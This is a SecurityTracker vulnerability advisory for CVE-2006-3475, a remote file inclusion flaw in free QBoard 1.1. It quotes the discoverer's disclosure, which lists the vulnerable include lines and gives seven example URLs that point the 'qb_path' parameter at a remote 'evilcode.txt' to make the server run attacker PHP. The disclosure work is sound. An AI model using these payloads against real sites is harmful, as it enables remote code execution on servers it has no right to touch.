free QBoard 'qb_path' Include File Bug Lets Remote Users Execute Arbitrary Code
|
|
SecurityTracker Alert ID: 1016433 |
|
SecurityTracker URL: http://securitytracker.com/id/1016433
|
|
CVE Reference:
CVE-2006-3475
(Links to External Site)
|
Updated: Aug 12 2008
|
Original Entry Date: Jul 4 2006
|
Impact:
Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Version(s): 1.1
|
Description:
A vulnerability was reported in free QBoard. A remote user can include and execute arbitrary code on the target system.
The software does not properly validate user-supplied input in the 'qb_path' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.
The following scripts are affected:
index.php
about.php
contact.php
delete.php
faq.php
features.php
history.php
CrAsh_oVeR_rIdE of Arabian Security Team discovered this vulnerability.
|
Impact:
A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: sourceforge.net/projects/freeqboard/ (Links to External Site)
|
Cause:
Input validation error, State error
|
Underlying OS:
Linux (Any), UNIX (Any), Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Sun, 02 Jul 2006 10:49:34 +0000
Subject: free QBoard v1.1 Multiple Remote File include
|
free QBoard v1.1 Multiple Remote File include
-------------------------------------------------
Discovered By CrAsh_oVeR_rIdE
Arabian Security Team
-------------------------------------------------
site of script:http://sourceforge.net/projects/freeqboard/
-------------------------------------------------
Vulnerable: free QBoard v1.1
-------------------------------------------------
vulnerable code:
----------------------
1- in index.php
include $qb_path."incs/mysql.php";
include $qb_path."incs/crypt.php";
----------------------------------
2- in about.php
include $qb_path."incs/header.php";
----------------------------------
3- in contact.php
include $qb_path."incs/header.php";
----------------------------------
4- in delete.php
include $qb_path."incs/mysql.php";
include $qb_path."incs/crypt.php";
----------------------------------
5- in faq.php
include $qb_path."incs/header.php";
----------------------------------
6- in features.php
include $qb_path."incs/header.php";
----------------------------------
7- in history.php
include $qb_path."incs/mysql.php";
include $qb_path."incs/crypt.php";
----------
$qb_path parameter File inclusion
-----------------------------------------------------------------------------------------------------------------------------------------
vulnerable files :
--------------------
index.php
about.php
contact.php
delete.php
faq.php
features.php
history.php
-------------------------------------------------
example:
www.example.com/(path)/index.php?qb_path=http://evilcode.txt?
www.example.com/(path)/about.php?qb_path=http://evilcode.txt?
www.example.com/(path)/contact.php?qb_path=http://evilcode.txt?
www.example.com/(path)/delete.php?qb_path=http://evilcode.txt?
www.example.com/(path)/faq.php?qb_path=http://evilcode.txt?
www.example.com/(path)/features.php?qb_path=http://evilcode.txt?
www.example.com/(path)/history.php?qb_path=http://evilcode.txt?
-------------------------------------------------
Discovered By CrAsh_oVeR_rIdE
E-mail:KARKOR23@hotmail.com
Site:www.lezr.com
Greetz:KING-HACKER,YOUNG HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOKAN3, mr-hcr AND ALL LEZR.COM Member
|
|
